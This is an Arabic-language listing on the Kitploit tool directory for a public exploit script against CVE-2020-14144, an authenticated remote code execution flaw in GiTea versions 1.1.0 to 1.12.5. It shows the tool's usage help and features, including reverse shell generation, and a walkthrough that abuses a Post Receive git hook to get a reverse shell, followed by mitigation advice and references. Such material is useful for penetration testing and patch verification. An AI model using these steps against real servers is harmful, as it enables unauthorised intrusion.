Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-14144-GiTea-git-hooks-rce — سكربت لاستغلال CVE-2020-14144 - تنفيذ تعليمات برمجية عن بُعد (Remote Code Execution) بعد المصادقة في GiTea باستخدام خطافات git | Kitploit
أدوات/GitHubGitHub/p0dalirius/cve-2020-14144-gitea-git-hooks-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubp0dalirius/cve-2020-14144-gitea-git-hooks-rce

CVE-2020-14144-GiTea-git-hooks-rce

سكربت لاستغلال CVE-2020-14144 - تنفيذ تعليمات برمجية عن بُعد (Remote Code Execution) بعد المصادقة في GiTea باستخدام خطافات git

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودعالموقع الإلكتروني
327منذ 5 أشهرتمت المراجعة من قبل Kitploit

CVE-2020-14144 - تنفيذ التعليمات البرمجية عن بُعد بعد المصادقة في GiTea

سكربت لاستغلال CVE-2020-14144 - تنفيذ التعليمات البرمجية عن بُعد بعد المصادقة في GiTea باستخدام git hooks
GitHub release (latest by date) YouTube Channel Subscribers

الميزات

  • توليد تلقائي لحمولة القشرة العكسية (Reverse Shell) من IP والمنفذ
  • رفع سكربت شل مخصص وتنفيذه عن بُعد باستخدام الخيار -f
  • تسجيل دخول تلقائي باسم المستخدم وكلمة المرور

الاستخدام

root@kitploit:~
$ ./CVE-2020-14144-GiTea-git-hooks-rce.py -h
    _____ _ _______
   / ____(_)__   __|             CVE-2020-14144
  | |  __ _   | | ___  __ _
  | | |_ | |  | |/ _ \/ _` |     Authenticated Remote Code Execution
  | |__| | |  | |  __/ (_| |
   \_____|_|  |_|\___|\__,_|     GiTea versions >= 1.1.0 to <= 1.12.5
     
usage: CVE-2020-14144-GiTea-git-hooks-rce.py [-h] [-v] -t TARGET -u USERNAME -p PASSWORD [-I REV_IP] [-P REV_PORT] [-f PAYLOAD_FILE]

CVE-2020-14144 - GiTea authenticated Remote Code Execution using git hooks

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose         Increase verbosity.
  -t TARGET, --target TARGET
                        Target host (http://..., https://... or domain name)
  -u USERNAME, --username USERNAME
                        GiTea username
  -p PASSWORD, --password PASSWORD
                        GiTea password
  -I REV_IP, --rev-ip REV_IP
                        Reverse shell listener IP
  -P REV_PORT, --rev-port REV_PORT
                        Reverse shell listener port
  -f PAYLOAD_FILE, --payload-file PAYLOAD_FILE
                        Path to shell script payload to use.

العرض التوضيحي

من أجل استغلال هذه الثغرة/الميزة بنجاح، يجب أن يكون إصدار خادم GiTea المستهدف بين الإصدار 1.1.0 والإصدار 1.13، وتحتاج إلى حساب صالح (اسم مستخدم، كلمة مرور) مع تفعيل صلاحية "May create git hooks".

حساب مع تفعيل صلاحية "May create git hooks"

من منظور إدارة الأنظمة، تبدو عملية gitea بهذا الشكل قبل الاستغلال:

حالة الخدمة قبل الاستغلال

أولاً وقبل كل شيء، نحتاج إلى إنشاء مستودع على واجهة الويب الخاصة بـ GiTea باستخدام حسابنا. ننشئ المستودع ثم ننتقل إلى Settings -> Git Hooks -> Post Receive Hook. في هذا الخطاف يمكنك كتابة سكربت شل سيتم تنفيذه بعد استلام commit جديد.

Post Receive Hook

الآن سننشئ دليلاً مؤقتًا على جهازنا المهاجم، ثم ندفع (push) التغييرات إلى المستودع البعيد. سيؤدي ذلك إلى تشغيل سكربت Post Receive Hook.

root@kitploit:~
touch README.md
git init
git add README.md
git commit -m "Initial commit"
git remote add origin https://vulnserver/testuser/vuln.git
git push -u origin master

بعد دفع الـ commit إلى المستودع البعيد، سيتم تشغيل سكربت Post Receive Hook وسنحصل على قشرة عكسية (Reverse Shell)!

القشرة العكسية

بعد الاستغلال، يمكن لمسؤول النظام بسهولة رؤية القشرة العكسية المنفصلة الخاصة بنا في العمليات الفرعية لـ GiTea:

حالة الخدمة بعد الاستغلال

إجراءات التخفيف

يُنصح بالتحديث إلى الإصدار 1.13.0 على الأقل.

مراجع إضافية

  • https://podalirius.net/en/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/
  • https://nvd.nist.gov/vuln/detail/CVE-2020-14144
  • https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/
  • https://docs.gitlab.com/ee/administration/server_hooks.html
  • https://github.com/go-gitea/gitea
  • https://github.com/go-gitea/gitea/pull/13058

المساهمة

طلبات السحب (Pull Requests) مرحب بها. لا تتردد في فتح issue إذا كنت ترغب في إضافة ميزات أخرى.

تنزيل الأداة